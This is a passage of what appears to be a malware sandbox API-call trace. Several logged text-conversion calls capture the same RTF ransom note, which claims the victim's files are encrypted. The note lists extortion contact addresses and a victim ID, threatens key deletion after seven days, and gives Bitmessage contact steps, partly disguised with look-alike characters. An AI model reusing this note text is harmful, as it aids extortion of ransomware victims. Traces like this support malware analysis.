emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.499] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.499] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 